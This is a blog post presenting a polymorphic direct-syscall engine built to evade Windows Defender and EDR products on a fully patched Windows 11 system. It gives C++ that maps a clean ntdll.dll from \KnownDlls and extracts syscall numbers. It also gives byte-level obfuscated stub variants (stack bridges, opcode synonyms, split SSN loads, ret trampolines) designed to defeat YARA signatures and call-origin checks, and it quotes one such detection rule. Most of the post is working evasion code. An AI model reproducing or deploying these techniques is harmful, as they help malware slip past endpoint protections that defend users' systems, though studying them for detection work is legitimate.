Polymorphic Syscall Engine
In this blog we will be talking about syscalls and how to make them a lil stealthier. Projects like HellsGate (https://github.com/am0nsec/HellsGate), Halo's Gate (https://github.com/boku7/AsmHalosGate), HellsHall (https://github.com/Maldev-Academy/HellHall), etc. are the pioneers of these methods. They work, but they lack stealth, as they produce syscall stubs which are easily detected by basic YARA rules. This blog is based on my project YetAnotherGate and will cover the core logic in some detail.
Setup
Everything we are going to talk about was done on the latest Windows and Defender versions, which at the time of writing this blog are:
Windows OS
- Edition: Windows 11 Pro
- Version: 25H2
- OS Build: 26200.7840
Defender Engine
- Client: 4.18.26010.5
- Engine: 1.1.26010.1
- AV / AS: 1.445.222.0
Environment
Everything is created and built to test modern security with all security features turned ON:
✓ Real-time protection
✓ Tamper Protection
✓ Memory integrity
✓ Memory access protection
✓ Microsoft Vulnerable Driver Blocklist
This is not just any project built to run in a vulnerable environment with security features turned off. This is some serious work and hence made just for education and research purposes.
Syscalls
Modern operating systems are built on the concept of Protection Rings (https://en.wikipedia.org/wiki/Protection_ring). User Space (Ring 3) is where your everyday programs run (web browsers, games, word processors). Programs here are restricted: they cannot directly access hardware, read arbitrary memory, or manage the network. Kernel Space (Ring 0) is the core operating system. It has absolute control over everything: the CPU, memory, hard drives, and network interfaces. If a user program wants to do something useful like read a file from the hard drive, print text to the screen, or send a network packet, it cannot do it directly. It must ask the kernel to do it. The syscall instruction is the mechanism for making that request.

WriteFile flow path from O'Reilly (https://oreilly.com)
A really nice example is the flow path of WriteFile. When the process calls WriteFile, which lives in Kernel32.dll, the function calls another, less abstracted function, NtWriteFile, inside another system library, ntdll.dll, and then the CPU transitions from user mode to kernel mode after the syscall instruction. ntdll.dll is a very important DLL in this cat and mouse game between security vendors and malware authors, as it contains the SSNs for all the functions we are going to talk about.
Syscalls via a debugger
Let us look at some syscall stubs via a debugger. We can use x64Dbg to catch any function and see what SSN (System Service Number) it has.

NtWriteFile inside the debugger
In the above image, I have opened x64Dbg. To find the SSN of any function, we can simply go to the "Symbols" tab, where the left panel lists all the DLLs the process has loaded. We can find ntdll.dll at the bottom; clicking on it shows all the functions it exports, one of which is NtWriteFile with Ordinal 688. Double-clicking the entry brings us back to the "CPU" tab where we can see the following:

NtWriteFile syscall stub
From the debugger we can see something like this:
mov r10, rcx
mov eax, 8
syscall
These 3 instructions are very important, and if you look closely at the above image, every function has the same pattern. The only difference is the number in the mov eax, 8 instruction. The number 8 is the SSN for the function. So, this means that if we know the SSN of a function, we can create a syscall stub for it and execute it ourselves.
The Security Landscape
Now that we know what happens when a function is called and what syscalls are, we can understand the security landscape and get a gist of why syscalls are so important.
Security solutions love to hook functions in both user mode and kernel mode, so for any security researcher or threat actor, bypassing these hooks becomes very important in order not to get flagged. By setting up the arguments in compliance with the x64 calling convention (https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention?view=msvc-170), where the first four go in RCX, RDX, R8 and R9 and the rest go on the stack, and then building and executing the syscall stub with the specific SSN, one can bypass these user mode hooks.
EDRs/AVs know this and hide the SSN by patching the ntdll.dll for the process. Security vendors do this by injecting their own dll in the process which patches the ntdll.dll.
Knowing this, researchers have found ways to still get their hands on a clean ntdll.dll to get the SSNs. Some of the techniques are Blindside (https://github.com/CymulateResearch/Blindside), Reading from disk (https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++), etc. But all these techniques have their own detection vectors.
YetAnotherGate
YetAnotherGate focuses on eliminating one of the detection vectors in modern syscall implementations. Stubs generated by modern solutions can be easily detected by YARA rules like:
rule Detect_Direct_Syscall_Stub_08
{
    strings:
        // 4C 8B D1 : mov r10, rcx
        // B8 00 00 00 00 : mov eax, 0x00000000
        // 0F 05 : syscall
        $syscall_sequence = { 4C 8B D1 B8 ?? ?? ?? ?? 0F 05 }
    condition:
        $syscall_sequence
}
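To make concrete what that rule matches, here is a minimal sketch of the same check written as a plain byte scan. It is an illustration only, not how YARA works internally. The function name find_plain_stub and both sample buffers are hypothetical and not taken from any real binary.

```cpp
#include <cstddef>
#include <cstdint>

// Returns the offset of the first occurrence of
//   4C 8B D1 B8 ?? ?? ?? ?? 0F 05
// in buf, or -1 when the pattern is absent. The four ?? bytes are wildcards.
constexpr long find_plain_stub(const std::uint8_t* buf, std::size_t len)
{
    constexpr std::size_t kPatternLen = 10;
    for (std::size_t i = 0; i + kPatternLen <= len; ++i)
    {
        const bool match =
            buf[i] == 0x4C && buf[i + 1] == 0x8B && buf[i + 2] == 0xD1 && // mov r10, rcx
            buf[i + 3] == 0xB8 &&                                         // mov eax, imm32
            buf[i + 8] == 0x0F && buf[i + 9] == 0x05;                     // syscall
        if (match) return static_cast<long>(i);
    }
    return -1;
}

// Hypothetical sample: a nop, the textbook stub with SSN 8, then a ret.
constexpr std::uint8_t kPlain[] = {0x90, 0x4C, 0x8B, 0xD1, 0xB8, 0x08, 0x00,
                                   0x00, 0x00, 0x0F, 0x05, 0xC3};
// Same bytes, except the first instruction uses the 49 89 CA encoding.
constexpr std::uint8_t kOther[] = {0x90, 0x49, 0x89, 0xCA, 0xB8, 0x08, 0x00,
                                   0x00, 0x00, 0x0F, 0x05, 0xC3};

static_assert(find_plain_stub(kPlain, sizeof(kPlain)) == 1, "textbook stub is found");
static_assert(find_plain_stub(kOther, sizeof(kOther)) == -1, "different bytes are not matched");
```

The second buffer shows why a fixed byte signature is brittle: changing the encoding of a single instruction is enough for this particular pattern to stop matching.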
YetAnotherGate doesn't just generate the stubs; it generates obfuscated assembly stubs via de-optimization, a method inspired by this Phrack article (https://phrack.org/issues/71/15_md#article). You can find the working PoC at the link below:
SSN retrieval
As we discussed, security solutions like to hide the SSN, so we will have to use one of the methods to retrieve a clean ntdll.dll. This part of the project always has room for improvement, as security solutions catch up really fast, but right now we will retrieve a clean copy from KnownDlls.
Clean ntdll.dll
Windows caches frequently used system DLLs in a special kernel object directory called \KnownDlls to speed up process creation, so we can target it. This is not the best way to do this, but for now we will work with it.
You will see me calling functions like fn.MyNtOpenSection instead of NtOpenSection. fn is just a structure that holds functions which are resolved dynamically, and they carry My as a prefix in the actual implementation. You will also find some custom wrappers like err and norm for logging.
InitUnicodeString(usName, L"\\KnownDlls\\ntdll.dll");
InitializeObjectAttributes(&objAttr, &usName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NTSTATUS status = fn.MyNtOpenSection(&hSection, SECTION_MAP_EXECUTE | SECTION_MAP_READ, &objAttr);
if(!NT_SUCCESS(status))
{
    err("NtOpenSection failed: 0x%X", status);
    return 0;
}
We request a handle (hSection) to the memory section containing the clean ntdll.dll and ask for SECTION_MAP_EXECUTE and SECTION_MAP_READ permissions. We absolutely need the execute permission because we will make the stubs reflective; we will talk about that later.
status = fn.MyNtMapViewOfSection(hSection, fn.MyGetCurrentProcess(), &base, 0, 0, nullptr, &viewSize, ViewShare, 0, PAGE_EXECUTE_READ);
if(!NT_SUCCESS(status))
{
    err("MyNtMapViewOfSection Failed");
    return 0;
}
fn.MyNtClose(hSection);
sLibs.hUnhookedNtdll = (HMODULE)base;
norm("\nClean ntdll.dll address via fallback (KnownDlls :/ ) -> 0x", std::hex, CYAN"", sLibs.hUnhookedNtdll);
This is the core action. We take the handle to the clean ntdll.dll section and map it into the virtual memory space of the current process (MyGetCurrentProcess()). The newly mapped memory is marked as readable and executable, which is necessary because we intend to run it later. base now stores the address of the clean ntdll.dll.
SSN
Now all we need to do is get the SSN for the functions we need. For this we will scan the bytes of each function for specific byte patterns. We should usually avoid relying on byte patterns as much as we can: if Microsoft decides to change anything related to this in the OS, stuff might break for us. In this case we can get away with it, because changing syscall stubs would require some serious changes in the OS, which is not going to happen soon.
We should also note the hex values for each instruction, so we know what we are looking for: 4C 8B D1 is mov r10, rcx, B8 followed by a 4-byte immediate is mov eax, SSN, and 0F 05 is syscall.
So, now that we have a clean ntdll.dll, we can use GetProcAddress to find the required function. Once we have the function's address we can traverse it like:
BYTE* pBytes = reinterpret_cast<BYTE*>(vpfunction);
if(pBytes[0] == 0x4C && pBytes[1] == 0x8B && pBytes[2] == 0xD1)
{
    norm("\n");
    ok("Function ", sEntry[j].function_name," is Unhooked\n");
    for(int i = 0; i < 32; ++i)
    {
        if(sEntry[j].SSN != 0 && sEntry[j].pCleanSyscall != nullptr) break;
        if(!sEntry[j].SSN && i + 4 < 32 && pBytes[i] == 0xB8)
        {
            sEntry[j].SSN = *(DWORD*)(pBytes + i + 1);
            //norm("SSN:",CYAN" 0x", std::hex, sEntry[j].SSN, "\n");
        }
        if(!sEntry[j].pCleanSyscall && i + 1 < 32 && (pBytes[i] == 0x0F && pBytes[i+1] == 0x05))
        {
            sEntry[j].pCleanSyscall = pBytes + i;
            //norm("Address of the Syscall: ", CYAN"0x", std::hex, reinterpret_cast<void*>(sEntry[j].pCleanSyscall), "\n");
        }
    }
}
You might have noticed the if(pBytes[0] == 0x4C && pBytes[1] == 0x8B && pBytes[2] == 0xD1) check. Just as a precaution, we look at the starting bytes to check for any hooks. If the function had a hook, we would have seen a jmp instruction there instead. To get the SSN, once we reach the mov eax instruction, which has opcode 0xB8, we can just read a DWORD from the next byte with *(DWORD*)(pBytes + i + 1). As we will make the stubs reflective, we should also get the address of the syscall instruction. It is encoded as 0F 05, which is exactly what we check with pBytes[i] == 0x0F && pBytes[i+1] == 0x05. So, now we are all set to generate the stubs, which we will cover in the next section.
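The DWORD read is the only non-obvious step, so here is a small sketch of it on a hardcoded sample buffer. It assumes the textbook 10-byte layout shown earlier. read_le32 and kSampleStub are hypothetical names used only for this illustration.

```cpp
#include <cstdint>

// Assemble a 32-bit little-endian value from four consecutive bytes.
// This is what *(DWORD*)(p) yields on x64, written without a pointer cast.
constexpr std::uint32_t read_le32(const std::uint8_t* p)
{
    return static_cast<std::uint32_t>(p[0]) |
           static_cast<std::uint32_t>(p[1]) << 8 |
           static_cast<std::uint32_t>(p[2]) << 16 |
           static_cast<std::uint32_t>(p[3]) << 24;
}

// Hypothetical sample: mov r10, rcx / mov eax, 8 / syscall.
constexpr std::uint8_t kSampleStub[] = {0x4C, 0x8B, 0xD1,             // mov r10, rcx
                                        0xB8, 0x08, 0x00, 0x00, 0x00, // mov eax, 8
                                        0x0F, 0x05};                  // syscall

// The opcode byte sits at offset 3, so the immediate starts at offset 4.
static_assert(kSampleStub[3] == 0xB8, "mov eax opcode");
static_assert(read_le32(kSampleStub + 4) == 8, "immediate decodes to SSN 8");
```

The immediate is stored least significant byte first, which is why 08 00 00 00 decodes to 8 and not to 0x08000000.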
De-optimization
This here is the heart of this project, so we need to understand what evasion by de-optimization is. When developers write code, compilers translate it into assembly. Modern compilers are incredibly smart; they optimize the code to make it as short, fast, and efficient as possible. Because most software is compiled this way, security tools build their detection signatures based on these predictable, highly optimized patterns, and in our case they can simply look for the syscall stubs. In the process of de-optimization we take this efficient, clean assembly code and intentionally make it longer, messier and less efficient. This completely changes the signature of that specific code. A very basic example that the Phrack post mentions is:
lea rcx, [0xDEAD] ------+-> lea rcx, [1CE54]
+-> sub rcx, EFA7
So, in this example we don't load 0xDEAD directly. We load 0x1CE54 and then subtract 0xEFA7, and since 0x1CE54 - 0xEFA7 = 0xDEAD, after these two instructions execute the RCX register still holds 0xDEAD. The program's behavior remains identical, but the compiled bytes are now completely different.
Arithmetic Partitioning
Compilers naturally want to encode hardcoded values like memory offsets and constants directly in the instruction as immediates, because it is fast. We can break this, however. Instead of loading a value directly, we can force the CPU to calculate it on the fly using randomized math:
mov eax, 12345678h
add dl, 25h
sub cx, 10A5h
push 0C0FFEEh
mov ebp, 0DEADBEEFh
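The arithmetic behind this can be checked in isolation. The sketch below only models the math of splitting one 32-bit immediate into a loaded value and an added value. It emits no instructions, and Partition, partition and recombine are hypothetical names used for illustration.

```cpp
#include <cstdint>

// One immediate expressed as two: the value that gets loaded first
// and the value that is added afterwards.
struct Partition
{
    std::uint32_t loaded;
    std::uint32_t added;
};

// Split value using an arbitrary key. Unsigned arithmetic wraps modulo 2^32,
// so any key works, even one larger than the value.
constexpr Partition partition(std::uint32_t value, std::uint32_t key)
{
    return Partition{value - key, key};
}

// What the register holds after "load, then add".
constexpr std::uint32_t recombine(Partition p)
{
    return p.loaded + p.added;
}

static_assert(partition(0x12345678u, 0x1000u).loaded == 0x12344678u, "simple split");
static_assert(recombine(partition(0x12345678u, 0xCAFEBABEu)) == 0x12345678u, "round trip");
static_assert(recombine(partition(5u, 0xFFFFFFF0u)) == 5u, "round trip with wraparound");
// The worked example from the text, as subtraction instead of addition.
static_assert(0x1CE54u - 0xEFA7u == 0xDEADu, "lea/sub example");
```

Because the key is free to vary, the same target value can be encoded with a different pair of immediates each time, which is the property the technique relies on.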
Logical Inverse
By leveraging mathematical properties, specifically De Morgan's Laws, we can take a single, predictable logical instruction and mutate it into a multi-step sequence. It looks completely different in hex, but the CPU computes the exact same final result.
xor r10d, 1337BEEFh
and al, 0Fh
or edx, 0A5A5A5A5h
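As a quick sanity check of the identities involved, the sketch below verifies them on 32-bit values. The function names are hypothetical. The XOR rewrite is a related Boolean identity, not De Morgan's Law proper, and is included here as an assumption about how an xor could be expanded.

```cpp
#include <cstdint>

// De Morgan: a AND b == NOT(NOT a OR NOT b)
constexpr std::uint32_t and_via_or(std::uint32_t a, std::uint32_t b)
{
    return ~(~a | ~b);
}

// De Morgan: a OR b == NOT(NOT a AND NOT b)
constexpr std::uint32_t or_via_and(std::uint32_t a, std::uint32_t b)
{
    return ~(~a & ~b);
}

// Related identity: a XOR b == (a OR b) AND NOT(a AND b)
constexpr std::uint32_t xor_via_and_or(std::uint32_t a, std::uint32_t b)
{
    return (a | b) & ~(a & b);
}

static_assert(and_via_or(0x12345678u, 0x0Fu) == (0x12345678u & 0x0Fu), "and");
static_assert(or_via_and(0x12345678u, 0xA5A5A5A5u) == (0x12345678u | 0xA5A5A5A5u), "or");
static_assert(xor_via_and_or(0x12345678u, 0x1337BEEFu) == (0x12345678u ^ 0x1337BEEFu), "xor");
```

Each rewritten form needs several instructions where the original needed one, which is exactly the trade the technique makes: more bytes and more work for the same result.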
Register Swapping
It is exactly what it sounds like. Consider XOR RCX, 0xAA. We can replace the RCX register with any other 64-bit register by exchanging the values before and after the original instruction.
xor r8, 0A5A5h
add r12, 100h
mov r14, r15
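The equivalence can be modelled with a toy two-register file. This is only a simulation of the register values, under the assumption that the swap is done with an exchange before and after the operation. Regs and the helper names are hypothetical.

```cpp
#include <cstdint>

// Toy register file with the two registers involved.
struct Regs
{
    std::uint64_t rcx;
    std::uint64_t rbx;
};

// Original instruction: xor rcx, imm
constexpr Regs xor_rcx(Regs r, std::uint64_t imm) { return Regs{r.rcx ^ imm, r.rbx}; }

// Same operation aimed at the substitute register: xor rbx, imm
constexpr Regs xor_rbx(Regs r, std::uint64_t imm) { return Regs{r.rcx, r.rbx ^ imm}; }

// xchg rcx, rbx
constexpr Regs xchg(Regs r) { return Regs{r.rbx, r.rcx}; }

// Swapped variant: xchg, operate on the other register, xchg back.
constexpr Regs swapped_variant(Regs r, std::uint64_t imm)
{
    return xchg(xor_rbx(xchg(r), imm));
}

constexpr bool same(Regs a, Regs b) { return a.rcx == b.rcx && a.rbx == b.rbx; }

static_assert(same(xor_rcx(Regs{0x1234, 0x9999}, 0xAA),
                   swapped_variant(Regs{0x1234, 0x9999}, 0xAA)),
              "both sequences leave the registers in the same state");
static_assert(swapped_variant(Regs{0x1234, 0x9999}, 0xAA).rcx == 0x129E, "0x1234 ^ 0xAA");
```

The second exchange is what restores the substitute register, so the surrounding code never sees that a different register did the work.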
Syscall Stubs
Now we can generate the syscall stubs. A stub should look like:
mov r10, rcx
mov eax, SSN
jmp [syscall_loc]
Notice we don't execute the syscall instruction ourselves: if we executed it here, security solutions could see that the syscall instruction ran from a very unlikely location and flag it. Hence we use the actual syscall instruction inside ntdll.dll, so the call appears to originate from inside the system DLL.
In our syscall stub, we won't use the original instructions but use the concept of de-optimization to create different variants for each of the original instructions, and make the syscall stub by randomly selecting the generated de-optimized variants for each of the instructions.
mov r10, rcx
V1A: Stack Bridge & Redundant XOR
0x9c, // pushf
0x51, // push rcx
0x4D, 0x31, 0xD2, // xor r10, r10
0x4C, 0x87, 0x14, 0x24, // xchg r10, [rsp]
0x59, // pop rcx
0x9d // popf
The main logic here lies in push rcx and xchg r10, [rsp]. Instead of moving rcx straight into r10, we push the value of rcx onto the stack and then use the xchg instruction to put it into r10, hence breaking the pattern. xor r10, r10 is redundant. However, in malware/evasion dev, inserting redundant instructions alters the byte signature and throws off linear disassembly analysis. Because xor r10, r10 alters the CPU's condition flags, the stub saves the flags to the stack so that it doesn't accidentally break any surrounding program logic, hence the pushf and popf.
V1B: Non-Destructive Stack Bridge
0x9c, // pushf
0x51, // push rcx
0x4C, 0x8B, 0x14, 0x24, // mov r10, [rsp]
0x59, // pop rcx
0x9d // popf
While the previous example altered the state of the CPU by wiping out the RCX register, this one takes a much cleaner, non-destructive approach, using the stack as a temporary bridge. It bypasses the static 0x4C, 0x8B, 0xD1 signature but leaves every other register exactly as it found it. The heart of this approach is mov r10, [rsp]. Instead of popping the stack or swapping values, this instruction simply reads the value currently sitting at the top of the stack (at the address in RSP) and copies it directly into R10.
V1C: Redundant AND & Opcode Synonym
0x9c, // pushf
0x49, 0x81, 0xE2, 0x00, 0x00, 0x00, 0x00, // and r10, 0
0x49, 0x89, 0xCA, // mov r10, rcx
0x9d // popf
Here we use redundancy again. and r10, 0 performs a logical AND of R10 with 0, and anything ANDed with 0 becomes 0, so this zeros out R10. Just like the xor r10, r10 from the first example, this instruction is functionally useless because the very next line overwrites R10 anyway. It acts purely as 7 bytes of padding to break up linear signatures and confuse static analysis. mov r10, rcx is the hero here. Notice the bytes: 0x49, 0x89, 0xCA. The standard, heavily signatured byte sequence for mov r10, rcx that EDRs look for is 0x4C, 0x8B, 0xD1. This executes the exact same instruction but uses entirely different bytes. As we use an and, we also need to save the flags, hence the pushf and popf.
mov eax, SSN
V2A: Fragmented Additive Reconstruction
0x31, 0xC0, // xor eax, eax
0xB0, 0x00, // mov al, SSN_LOW
0x81, 0xC0, 0x00, 0x00, 0x00, 0x00 // add eax, SSN_HIGH_SHIFTED
Instead of moving data into the full 32-bit EAX register, we target AL, which is the lowest 8-bit section of EAX. We move the lowest byte of the syscall number into this slot using mov al, SSN_LOW.
If the SSN is at most 0xFF (255), the actual SSN is already fully loaded here.
We then add the remaining upper bytes of the syscall number (the SSN with its low byte cleared) to the EAX register with add eax, SSN_HIGH_SHIFTED. EAX now holds the intended SSN, ready for the syscall instruction.
V2B: The Bifurcated SSN Load
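The three steps can be traced on plain integers. The sketch below only simulates the value of EAX. It assumes SSN_LOW is the low byte of the SSN and SSN_HIGH_SHIFTED is the SSN with that byte cleared, which is the only split that makes the sum come out right. rebuild_v2a is a hypothetical name.

```cpp
#include <cstdint>

// Simulate the value of EAX across the three instructions of this variant.
constexpr std::uint32_t rebuild_v2a(std::uint32_t ssn)
{
    std::uint32_t eax = 0;                     // xor eax, eax
    eax = (eax & 0xFFFFFF00u) | (ssn & 0xFFu); // mov al, SSN_LOW (only the low byte changes)
    eax += ssn & 0xFFFFFF00u;                  // add eax, SSN_HIGH_SHIFTED
    return eax;
}

static_assert(rebuild_v2a(0x08u) == 0x08u, "fits in AL, the add contributes 0");
static_assert(rebuild_v2a(0x1A3u) == 0x1A3u, "low byte A3 plus high part 0x100");
```

For an SSN such as 0x1A3 the stub carries the immediates 0xA3 and 0x100, so the full number never appears as one constant.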
0xB8, 0x00, 0x00, 0x00, 0x00, // mov eax, X
0x05, 0x00, 0x00, 0x00, 0x00 // add eax, Y
Instead of loading the SSN directly, we construct it at runtime. We create numberA and numberB such that numberA + numberB = SSN. This requires a lil bit of pre-processing, as you can see:
BYTE randNum = (BYTE)(rand() % 0x50);
*(DWORD*)(byte_stub + 1) = randNum;
*(DWORD*)(byte_stub + 6) = sEntry->SSN - randNum;
If you are still reading this blog, I would assume you know what's happening here and save my energy from explaining this basic stuff.
V2C: Stack-Bridged SSN Load
0x9C, // pushfq
0x31, 0xC0, // xor eax, eax
0x68, 0x00, 0x00, 0x00, 0x00, // push SSN
0x58, // pop rax
0x9D, // popfq
This stub completely avoids the standard mov eax, SSN by routing the SSN through the stack. Pretty basic: push SSN pushes the hardcoded SSN onto the top of the stack, and pop rax pops the value sitting at the top of the stack (the SSN) directly into the 64-bit RAX register. We also need to save the flags because we are using xor.
jmp [syscall_loc]
V3A: The XCHG-RET Trampoline
0x50, // push rax
0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov rax, syscall_addr
0x48, 0x87, 0x04, 0x24, // xchg rax, [rsp]
0xC3 // ret
As we want to avoid detection by security solutions, we make our stub reflective and jump to the syscall address instead of hardcoding the syscall instruction. Remember from our previous stubs that RAX holds our carefully constructed System Service Number (SSN). If RAX changes, the kernel won't know what function you want to call. To avoid this, we push the rax register onto the stack. Now, mov rax, syscall_addr loads a memory address into RAX. This address points to a legitimate syscall instruction already sitting naturally somewhere inside ntdll.dll. The magic lies in xchg rax, [rsp]: it swaps the value in RAX (the ntdll.dll address) with the value sitting at the top of the stack ([RSP], which is your SSN). Finally, the ret instruction pops the memory address off the top of the stack and jumps to it, effectively loading it into the CPU's Instruction Pointer.
V3B: The Pushf-Allocated ROP Jump
0x9C, // pushf
0x48, 0xC7, 0x04, 0x24, // mov qword [rsp], imm32 (lower half, sign-extended)
0x00, 0x00, 0x00, 0x00,
0xC7, 0x44, 0x24, 0x04, // mov dword [rsp+4], imm32 (upper half)
0x00, 0x00, 0x00, 0x00,
0xC3, // ret
This stub builds on the trampoline concept from the last example, but it introduces a completely new way to construct the jump address and allocate stack space. Instead of moving an address into a register and pushing it, this stub constructs the jump address directly inside the stack memory, piecemeal. Here pushf is used for a completely different reason: stealthy stack allocation.
Pushing the flags automatically subtracts 8 from the Stack Pointer (RSP = RSP - 8), so we just allocated 8 bytes of space on the stack without using a highly visible sub rsp, 8 or push rax instruction.
The fact that it wrote the RFLAGS data into that space doesn't matter, because the next instructions will immediately overwrite it.
The first mov takes the lower 32 bits of the target memory address and writes them into the lower 4 bytes of the space we just allocated on the stack. Because of the 0x48 (REX.W) prefix, the store is 8 bytes wide and the immediate is sign-extended, so the upper 4 bytes only hold filler at this point.
mov dword [rsp+4], imm32 takes the upper 32 bits of the target address and writes them into the upper 4 bytes of that same stack space (RSP + 4), replacing the filler. The stack memory at [RSP] now contains the full 64-bit memory address.
You might have noticed that we pushed the flags but did not pop them. If you executed popf here, the CPU would take the 64-bit address we just painstakingly built and shove it into the RFLAGS register, removing it from the stack. That would ruin the payload and likely crash the program.
And finally ret pops the 64-bit value currently sitting at the top of the stack into the Instruction Pointer (RIP) and we are done.
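The way the 8-byte stack slot ends up holding the full address can be traced on plain integers. The sketch below only simulates the slot contents. build_return_slot and the addresses are hypothetical, and the first store is modelled as 8 bytes wide with sign extension because its encoding carries the 0x48 prefix.

```cpp
#include <cstdint>

// Simulate the 8-byte stack slot across pushf and the two mov instructions.
constexpr std::uint64_t build_return_slot(std::uint64_t target, std::uint64_t saved_flags)
{
    std::uint64_t slot = saved_flags; // pushf: the slot first holds RFLAGS

    const std::uint32_t low  = static_cast<std::uint32_t>(target);
    const std::uint32_t high = static_cast<std::uint32_t>(target >> 32);

    // 48 C7 04 24 imm32: 8-byte store of the sign-extended low half.
    slot = (low & 0x80000000u) ? (0xFFFFFFFF00000000ull | low)
                               : static_cast<std::uint64_t>(low);

    // C7 44 24 04 imm32: 4-byte store to [rsp+4], replacing the upper half.
    slot = (slot & 0x00000000FFFFFFFFull) | (static_cast<std::uint64_t>(high) << 32);

    return slot; // the value ret would pop into RIP
}

// Hypothetical addresses; 0x246 stands in for an arbitrary RFLAGS value.
static_assert(build_return_slot(0x00007FFB12345678ull, 0x246) == 0x00007FFB12345678ull,
              "low half without sign bit");
static_assert(build_return_slot(0x00007FFB9ABCDEF0ull, 0x246) == 0x00007FFB9ABCDEF0ull,
              "low half with sign bit set, filler is overwritten");
```

The second assertion covers the case where the low half has its top bit set: the first store fills the upper bytes with 0xFF, and the second store still replaces them with the real upper half.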
V3C: The Basic Jump
0xFF, 0x25, 0x00, 0x00, 0x00, 0x00, // jmp [rip+0]
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 // syscall address
We could also just fall back to the old bread and butter as we are already avoiding the syscall via the jmp.
Future Improvements
ntdll.dll Sourcing
We heavily depend on known methods to fetch a clean ntdll.dll. While some methods currently work, others will likely fail as security solutions evolve. Implementing dynamic, robust sourcing is a top priority.
Instruction Variant Expansion
We plan to expand our mutation engine to add far more de-optimized variants for different instructions, drastically increasing the randomness and entropy of the generated stubs.